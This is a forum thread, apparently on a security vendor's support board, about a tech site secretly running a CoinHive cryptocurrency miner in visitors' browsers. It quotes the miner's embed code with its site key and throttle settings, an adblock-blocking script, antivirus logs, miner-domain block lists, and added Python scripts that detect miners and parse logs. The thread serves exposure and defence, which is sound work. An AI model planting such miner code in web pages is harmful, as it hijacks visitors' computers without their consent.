
Posted (edited)

Since I never get any response from ESET, I just thought I would also post this here for an admin to make sure this site is blocked. Here is a copy of the email I just sent to the ESET Samples Team:

Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it

 

===========================================================================================================

Just like to warn you guys that it would seem that techinferno has now started to use end users' computers to mine cryptocurrency.


Just went on myself to check for some info and watched my CPU spike to 100% with the system lagging, even down to the GPU driver crashing. When I closed the tab it went back to normal; I then went and viewed the source for the index page.

Here is what was found:


<link rel='shortcut icon' href='****://sslcdn.techinferno.com/uploads/monthly_2017_08/favicon.ico.902cfabe37f7260915a7c8342595a33e.ico'>

<script src="****://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu');
miner.start();
</script>


TOS

Tech|Inferno is a technology website dedicated to discovering the latest breakthroughs in vbios, bios, egpu and other trends in the industry. As part of this dedication to cutting edge technology, we sometimes try new technologies as part of our codebase that can range from subtle advertising in the form of text to silent cryptocurrency mining. None of the technology we test on this website will ever adversely affect our end users as we try to keep it minimal and out of sight so that our users can maximize their enjoyment of Tech|Inferno without the typical advertisements cluttering their screens.


 

Edited by Phoenix
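The source quoted above shows the two signs of an in-browser miner: the external library include and the inline constructor plus start() call. The Python script below is an added example, not code from this thread or from ESET, that scans a saved page source for both. The sample page is constructed here with a placeholder site key; matching any CoinHive.<name> constructor rather than only Anonymous is an assumption, as is the inclusion of crypto-loot.com (named later in the thread) in the host list.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts of the in-browser miner libraries named in this thread.
MINER_HOSTS = ("coinhive.com", "crypto-loot.com")

# Inline-code markers. The CoinHive.Anonymous(...) constructor and miner.start()
# come from the snippet quoted in the thread; matching any CoinHive.<name>
# constructor is an assumption so that other API variants are caught too.
INLINE_PATTERNS = (
    re.compile(r"new\s+CoinHive\.\w+\s*\("),
    re.compile(r"\bminer\.start\s*\("),
)

# Constructed sample page, modelled on the quoted source; the site key is a placeholder.
SAMPLE_PAGE = """<html><head>
<link rel='shortcut icon' href='https://sslcdn.example.test/favicon.ico'>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('EXAMPLE_SITE_KEY_PLACEHOLDER');
miner.start();
</script>
</head><body>forum index</body></html>
"""


def host_matches(hostname, blocked):
    """True if hostname equals a blocked domain or is a subdomain of one."""
    if not hostname:
        return False
    hostname = hostname.lower()
    return any(hostname == d or hostname.endswith("." + d) for d in blocked)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data as raw text.
        if self._in_script and data.strip():
            self.inline.append(data)


def find_miner_indicators(page_source):
    """Return (kind, evidence) tuples for every miner indicator found in the page."""
    collector = ScriptCollector()
    collector.feed(page_source)
    findings = []
    for src in collector.external:
        if host_matches(urlparse(src).hostname, MINER_HOSTS):
            findings.append(("external-script", src))
    for body in collector.inline:
        for pattern in INLINE_PATTERNS:
            match = pattern.search(body)
            if match:
                findings.append(("inline-script", match.group(0)))
    return findings


if __name__ == "__main__":
    for kind, evidence in find_miner_indicators(SAMPLE_PAGE):
        print(f"{kind}: {evidence}")
```

Run it against a page saved with "view source" to get the same two kinds of hit that Phoenix found by eye; a page with no script includes from the listed hosts and no CoinHive constructor returns an empty list.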
Posted

If you turn on the detection of "potentially unsafe application", ESET will detect the miner script. Not sure why this is in "potentially unsafe" but not "potentially unwanted"

Posted
22 minutes ago, 0xDEADBEEF said:

If you turn on the detection of "potentially unsafe application", ESET will detect the miner script. Not sure why this is in "potentially unsafe" but not "potentially unwanted"

I have turned on detect potentially unsafe applications, it doesn't detect it, and this should be detected by the HTTP scanner. Kaspersky is already blocking it.

  • Administrators
Posted

No problem here:

Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
11/12/2017 8:38:30 PM;HTTP filter;file;hxxps://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.F potentially unsafe application;connection terminated;DESKTOP-5JIJ6V4\Admin;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

It's been detected for a month already.
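The detection above is in ESET's semicolon-separated log export. The Python below is an added example, not ESET's code or a tool from this thread, that parses that format, re-fangs the hxxps:// scheme used when logs are shared, and pulls out every CoinMiner detection with the host it was blocked on. The three log lines are constructed for the example: the hostnames, user name, the crypto-loot.com path and the "Example/Placeholder" detection name are made up, and the JS/CoinMiner.F name is reused from the record quoted above.

```python
import csv
import io
import re
from urllib.parse import urlparse

# Constructed log excerpt in the export format shown in this thread. The first line
# mirrors the quoted record; the other two (hosts, path, placeholder detection) are made up.
SAMPLE_LOG = r"""Time;Scanner;Object type;Object;Threat;Action;User;Information;Hash;First seen here
11/12/2017 8:38:30 PM;HTTP filter;file;hxxps://coinhive.com/lib/coinhive.min.js;JS/CoinMiner.F potentially unsafe application;connection terminated;DESKTOP-EXAMPLE\User;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
11/12/2017 8:41:02 PM;HTTP filter;file;hxxps://ws09.crypto-loot.com/miner.js;JS/CoinMiner.F potentially unsafe application;connection terminated;DESKTOP-EXAMPLE\User;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
11/12/2017 8:45:10 PM;HTTP filter;file;hxxps://cdn.example.test/tracker.js;Example/Placeholder potentially unwanted application;connection terminated;DESKTOP-EXAMPLE\User;Threat was detected upon access to web by the application: C:\Program Files (x86)\Mozilla Firefox\firefox.exe
"""


def refang(url):
    """Turn the defanged hxxp/hxxps scheme used in shared logs back into http/https."""
    return re.sub(r"^hxxp(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def parse_eset_log(text):
    """Parse the semicolon-separated export into dicts keyed by the header names.

    Records may have fewer fields than the header (the quoted record lacks Hash and
    First seen here), so missing columns are filled with an empty string.
    """
    reader = csv.DictReader(io.StringIO(text), delimiter=";", restval="")
    return list(reader)


def coin_miner_events(records):
    """Return (time, host, action) for every CoinMiner detection in the log."""
    events = []
    for rec in records:
        if "CoinMiner" not in rec.get("Threat", ""):
            continue
        host = urlparse(refang(rec["Object"])).hostname or ""
        events.append((rec["Time"], host, rec["Action"]))
    return events


def miner_hosts(records):
    """Sorted, de-duplicated list of hosts that CoinMiner detections were blocked on."""
    return sorted({host for _, host, _ in coin_miner_events(records)})


if __name__ == "__main__":
    recs = parse_eset_log(SAMPLE_LOG)
    for when, host, action in coin_miner_events(recs):
        print(f"{when}  {host:<28}{action}")
    print("hosts:", ", ".join(miner_hosts(recs)))
```

The host list is what you would feed into a URL block list, and because it comes from the Object column rather than the detection name it also surfaces subdomain variants such as the ws09.crypto-loot.com form discussed later in the thread.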

Posted (edited)
5 hours ago, Phoenix said:

Please check this site: https://www.techinferno.com/index.php?/forums/ and have ESET’s HTTP Scanner block it

 

Eset didn't block it for me using IE11. Neither did my Eset web filter for coinhive.com/*. Appears the site added some adblock detection. Below is the expanded script for adblock detection:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

adblock
<script>
  var miner = new CoinHive.Anonymous('uWKXebL5jXICjXGj85wncylJDkRN9gVu');
  miner.start();
  miner.getAutoThreadsEnabled();
  miner.setThrottle('0.8');
</script>
 

-EDIT- Here's the rest of the code. I did not see any adverse CPU activity while browsing on that web site. I did see a popup about enabling cookies that perhaps is related to the below code. Perhaps 3rd party cookies need to be enabled to enable the coin miner?

</head>
<script type="text/javascript">
  var adblock = true;
</script><script src=""></script><script src=""></script><script type="text/javascript">
  if(adblock) {
    $(document).ready(function() {
      $.blockUI({
        message: $('#zozPopupMsg'),
        css: { cursor: 'default',
               border:'none',
               top:'10%',
             },
        showOverlay: 1,
        overlayCSS: { cursor: 'default',
                      opacity: 1
                    },
        baseZ: 100000,
        centerX: true,
        centerY: true,
        allowBodyStretch: true,
        bindEvents: true,
        constrainTabKey: true,
        fadeIn:  500,
      });
      //Disable Scroller
      $('html, body').css({
        'overflow': 'hidden',
        'height': '100%'
      });
    });
  }
</script>

 

Edited by itman
Posted

Also of interest: when surfing to a web site article about coin mining later, it contained a coin miner I was not previously aware of. So it appears the techinferno.com Coin Hive miner was indeed never activated.

[Attached screenshot: Coin_Miner.png]

  • Most Valued Members
Posted

There are also upcoming miners that are not going to use Java or a specific URL to mine, so it will be interesting to see how that one pans out :ph34r:

Posted (edited)

Just checked the TechInferno web site and the Coin Hive miner is gone.

Edited by itman
Posted (edited)

I can confirm that Eset is not detecting the Coin Hive miner on the posted TechInferno web site link. Neither is the Fanboy Adblock TPL I use in IE11. I do know this TPL does have an entry for Coin Hive. So it appears that Coin Hive has indeed figured out a way around the block lists and AV PUA detection.

I didn't initially detect the coin mining activity since you have to enter one of the sub-forums from the main TechInferno forum web page for the coin mining to take place. Also on my PC, possibly because it has a 6-core CPU, I didn't see CPU activity exceeding 15%. However, I didn't stick around long on that web page.

-EDIT- Appears the coin mining is going on through the animated banner on the web page. Position your mouse cursor on the banner text to stop the scrolling. CPU activity drops to next to nil.

Edited by itman
Posted
5 hours ago, itman said:

I can confirm that Eset is not detecting the Coin Hive miner on the posted TechInferno web site link. Neither is the Fanboy Adblock TPL I use in IE11. I do know this TPL does have an entry for Coin Hive. So it appears that Coin Hive has indeed figured out a way around the block lists and AV PUA detection.

I didn't initially detect the coin mining activity since you have to enter one of the sub-forums from the main TechInferno forum web page for the coin mining to take place. Also on my PC, possibly because it has a 6-core CPU, I didn't see CPU activity exceeding 15%. However, I didn't stick around long on that web page.

-EDIT- Appears the coin mining is going on through the animated banner on the web page. Position your mouse cursor on the banner text to stop the scrolling. CPU activity drops to next to nil.

@Marcos

 

Can you please comment on this? Also, why does ESET Samples never reply to me?

Posted (edited)

-Edit- Just refer to the below screen shot as proof that Eset's URL list blocking does work. However and of course, it will not be triggered if the coin miner URL has been blocked by other means.

Definitely "wild and crazy" Coin Hive mining going on! I found a way to get Eset's Web Filtering URL block list to detect the Coin Hive connection on the TechInferno web site as shown in the below screen shot. I will describe the "how" and speculate on the "why."

I installed the Adblock Plus add-on for IE11. I then disabled the Fanboy Adblock TPLs; both the Easylist and the Easylist Privacy TPLs. Important - all TPLs have to be disabled or Adblock Plus won't allow for detection of this Coin Hive miner instance on the TechInferno web site.

Now for the "speculation" as to why this works. Appears the connection to Coin Hive is somehow occurring through some type of redirect or "camouflaging". It also appears that Adblock Plus can "trace" this activity and resolve to the "real" https://coinhive.com/lib/coinhive.min.js address. As such, Eset's URL filtering can now detect it upon connection attempt. Bottom line - looks like Coin Hive has figured out a way to defeat host based URL filtering.

[Attached screenshot: Coin_Hive_Blocked.png]

Edited by itman
  • Most Valued Members
Posted

The authors of Adblock sold their soul nearly a year ago now. Hence why webpages can now detect it and either block you until you whitelist the page or work their way round it. It's now a near-useless plugin :wacko:

As mining for revenue goes, it's a pretty grey area. If the site actually states or alerts the user on visiting the site that they agree to mining then it's not really "unwanted or unsafe". It's the user who agrees to it in the first place by accepting the T&C. But a large proportion of website owners won't display a message and break the "unchecked" rules.

Plenty of legitimate sites use mining as an alternative revenue stream and drop ads from the site completely. If ESET or any AV vendor starts blocking this universally then I imagine it will cause a massive influx of unhappy customers who can't visit a website they have been going to for many years.

Enabling PUA allows detection, but it will also bring some inherent problems of its own along the way, e.g. legitimate applications that have in-app advertising will also be detected and blocked.

I can understand why ESET are approaching the matter in the manner they do, as they have never advertised their product as an anti-revenue/ads product and neither has any other AV vendor.

These decisions have always been left to the end user and the use of 3rd party browser plugins.

Coinminer & Authedmine come from the same author, but the latter of the 2 was to allow a user opt-in process and allowing user choice.

 

Posted (edited)

OK, there is only one way to make sure that we are safe: disable Java + use a sandboxed browser.
AVs failed against blackhat coders :-)

Edited by persian-boy
  • Most Valued Members
Posted
1 hour ago, persian-boy said:

OK, there is only one way to make sure that we are safe: disable Java + use a sandboxed browser.
AVs failed against blackhat coders :-)

I don't think it's a matter of failing. They could easily be blocked, but it's a fact that these miners also have a legitimate purpose and that's where the grey area comes into play. But as noted above you DO have the option of enabling detection of PUA.

Alternatively ............

Not installing & running Java, using something along the lines of NoScript (hard for novices), plus using a browser that "asks" when Flash content wants to run and does not allow it by default.

There are also plugins like "No Coin" appearing that specifically target these miners.

 

Posted (edited)

Failed, because there are more advanced miners than a simple .js script, and you can't solve them with the NoScript/No Coin extensions or by enabling PUA in Eset! Also, it's not legitimate, since they use the CPU without the user's knowledge :P
No Coin or PUA in Eset can't help you with this:
Researchers at IBM have found a more sophisticated class of surreptitious mining software that penetrates your system. These are delivered through infected image files or by clicking on links leading to a malicious site. Such attacks tend to target enterprise networks....
https://qz.com/1085171/how-to-tell-if-your-computer-is-secretly-mining-cryptocurrency-and-what-to-do-about-it/

 

Edited by persian-boy
Posted
7 hours ago, cyberhash said:

I don't think it's a matter of failing. They could easily be blocked, but it's a fact that these miners also have a legitimate purpose and that's where the grey area comes into play. But as noted above you DO have the option of enabling detection of PUA.

Alternatively ............

Not installing & running Java, using something along the lines of NoScript (hard for novices), plus using a browser that "asks" when Flash content wants to run and does not allow it by default.

There are also plugins like "No Coin" appearing that specifically target these miners.

 

I have enabled the no coin rule in Adblock Plus, perhaps that's why ESET wasn't alerting me of anything when visiting that site?

Posted
2 hours ago, Phoenix said:

I have enabled the no coin rule in Adblock Plus, perhaps that's why ESET wasn't alerting me of anything when visiting that site?

Yes.

The NoCoin rule in the full AdBlock Plus solution, in addition to the NoCoin extension in Firefox and possibly a similar Chrome plug-in, uses the GitHub list described here: https://github.com/hoshsadiq/adblock-nocoin-list . So in your case, this would have blocked the coinhive.com connection prior to Eset's URL block list intercepting it. Unfortunately, the Adblock Plus add-on for IE does not have such capability and you are forced to use another URL block list method.

However, I thought you commented on your CPU spiking when entering the web site? Did this occur prior to adding the Adblock Plus NoCoin rule?

Posted (edited)

Yikes!

I finally resolved why I was not getting an Eset URL block alert on the TechInferno web site when using IE's Fanboy Adblock TPLs; both the Easylist and the Easylist Privacy TPLs. The EasyList Privacy TPL contains all the Coin Miner URLs in the GitHub NoCoin List. Appears the TPL is updated with Coin Miner URLs every time the GitHub NoCoin list is updated.

As such, there is no reason to separately add the Adblock Plus toolbar extension in IE. Also if you are using the Fanboy AdBlock EasyList Privacy TPL in IE, there is no reason to add the GitHub NoCoin list URLs to a corresponding Eset URL block list.

-EDIT- What caused my confusion on this is that when I viewed the details of both EasyList TPLs in IE via manage add-ons, I could find no ref. to any of the NoCoin list of coin miner URLs. Appears what AdBlock, who now maintains the Fanboy IE TPL lists, does is reformat the NoCoin URLs into a compatible IE TPL format and then merge them into the daily EasyList Privacy TPL update download. Lesson learned - always refer to the .tpl files stored in the %AppData%/Roaming/ directory.

Edited by itman
Posted
18 hours ago, cyberhash said:

Coinminer & Authedmine come from the same author, but the latter of the 2 was to allow a user opt-in process and allowing user choice.

This might explain why Authedmine URL is not listed in the NoCoin block list.

Posted
5 hours ago, itman said:

Yes.

The NoCoin rule in the full AdBlock Plus solution, in addition to the NoCoin extension in Firefox and possibly a similar Chrome plug-in, uses the GitHub list described here: https://github.com/hoshsadiq/adblock-nocoin-list . So in your case, this would have blocked the coinhive.com connection prior to Eset's URL block list intercepting it. Unfortunately, the Adblock Plus add-on for IE does not have such capability and you are forced to use another URL block list method.

However, I thought you commented on your CPU spiking when entering the web site? Did this occur prior to adding the Adblock Plus NoCoin rule?

That was on another system with nothing installed

 

So when I checked that link on my system, NOD32 didn't alert me of anything. Now it makes sense that you mention it though; seems that the No Coin filter is worth it after all.

Posted

Also time again to review what Eset by default will and will not protect against in regards to coin miners.

Eset via PUA detection will prevent a coin miner from being installed in the cache/temporary storage of the browser. If a coin miner can be installed in this way, it can mine on every web site you land on.

Eset will not prevent a coin miner installed on a web server hosting the web page from mining. You need to either install an adblocker for your browser that uses GitHub's NoCoin list, or EasyList's Privacy TPL if you're using IE, to stop this type of activity. Alternatively, you can create your own Eset URL block list for coin miner URLs. However, you will be responsible for manually updating that list on a periodic basis.

Posted (edited)

I will add that you can't 100% rely on NoCoin to stop all web server based coin mining. Notably missing from the NoCoin URL list is the second most widely used coin miner - Crypto-Loot.

-EDIT- Appears the NoCoin list does include Crypto-Loot.com. However, it is not stopping Crypto-Loot from running. Suspect because the URL is formatted as ws09.crypto-loot.com or ws23.crypto-loot.com, as shown in the bleepingcomputer.com article with MBAM blocking these two URLs. Proof that adblocker list blocking has limited functionality.

A good read on how that was recently used maliciously is here: https://www.bleepingcomputer.com/news/security/cookie-consent-script-drops-in-browser-cryptocurrency-miner/ .

So one needs to keep up with coin miner development and add them, as I did for Crypto-Loot, to an Eset coin miner URL block list I created. The bleepingcomputer.com article notes that the malicious Crypto-Loot coin miner was removed from the Cookie Consent web site but they left their own older one in place as noted below:

[Attached screenshot: Crypto_Loot.png]

Edited by itman
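Two points in this thread come down to how a block list is matched and formatted: itman's earlier finding that the EasyList Privacy TPL carries the NoCoin entries rewritten into IE's TPL format, and the Crypto-Loot case above, where a list entry for crypto-loot.com does nothing if the matcher compares exact hostnames against ws09.crypto-loot.com. The Python below is an added example, not the NoCoin project's code nor anything from AdBlock or ESET: it parses the ||domain^ rule form that the adblock-nocoin-list repository uses, shows exact-host matching missing the subdomain while domain-suffix matching catches it, and renders the domains as a TPL. The list excerpt is constructed (the comment line and the /miner-script.js path rule are made up), and the TPL layout (msFilterList header, Expires line, -d entries) is assumed from the format's public description, with subdomain handling left to the browser.

```python
import re

# Constructed excerpt in Adblock Plus filter syntax; the two domains are from this
# thread, the comment and the path rule are made up to exercise the parser.
SAMPLE_NOCOIN = """! Title: NoCoin (constructed excerpt for this example)
||coinhive.com^
||crypto-loot.com^$third-party
/miner-script.js
"""

# ||domain^ optionally followed by $options; other rule shapes are ignored here.
DOMAIN_RULE = re.compile(r"^\|\|([a-z0-9.-]+)\^(?:\$.*)?$", re.IGNORECASE)


def parse_abp_domains(text):
    """Extract the domains from ||domain^ rules, skipping comments and other rule types."""
    domains = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("!"):
            continue
        match = DOMAIN_RULE.match(line)
        if match:
            domains.append(match.group(1).lower())
    return domains


def exact_host_blocked(host, domains):
    """Exact-hostname comparison, like a plain URL block list: misses subdomains."""
    return host.lower() in domains


def domain_blocked(host, domains):
    """Domain-suffix comparison, the semantics an ABP ||domain^ rule is meant to have."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def to_tpl(domains, expires_days=1):
    """Render the domains as an IE Tracking Protection List (assumed -d layout)."""
    lines = ["msFilterList", f": Expires={expires_days}"]
    lines.extend(f"-d {d}" for d in domains)
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    blocked = parse_abp_domains(SAMPLE_NOCOIN)
    for host in ("coinhive.com", "ws09.crypto-loot.com", "ws23.crypto-loot.com", "notcoinhive.com"):
        print(f"{host:<24} exact={exact_host_blocked(host, blocked)!s:<6} "
              f"suffix={domain_blocked(host, blocked)}")
    print(to_tpl(blocked))
```

The notcoinhive.com case is why the suffix check prepends a dot before comparing: a bare endswith("coinhive.com") would block unrelated domains that merely end in the same characters, which is the kind of false positive that makes people disable a list.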
Posted (edited)

I will note this in regards to web site server based coin mining. Eset has a Web Filtering option that has an option to inspect javascript code which is enabled by default. It is this filter that allows it to detect attempted coin miner installation in the browser. Since this filter exists, Eset could w/o much difficulty add a GUI option to detect attempted web server based coin mining.

This option would be disabled by default which would absolve Eset from complaints by coin miner developers that Eset is blocking their software. Two options could be provided in regards to this option; block or ask. The ask option would throw an alert and the user could allow or block the coin mining activity. Inclusion of the ask option would further protect Eset from coin miner developers since again, it is the user who is deciding to allow the coin mining activity.

Optionally, and desired, Eset would provide built-in coin miner URL block and allow lists to facilitate ask mode processing. When a coin miner is allowed, it is added to the coin miner URL allow list. When a coin miner is blocked, it is added to the coin miner URL block list. Use of these lists would prevent any further alerts when operating in coin miner ask mode and a previously detected web site is subsequently visited.

Edited by itman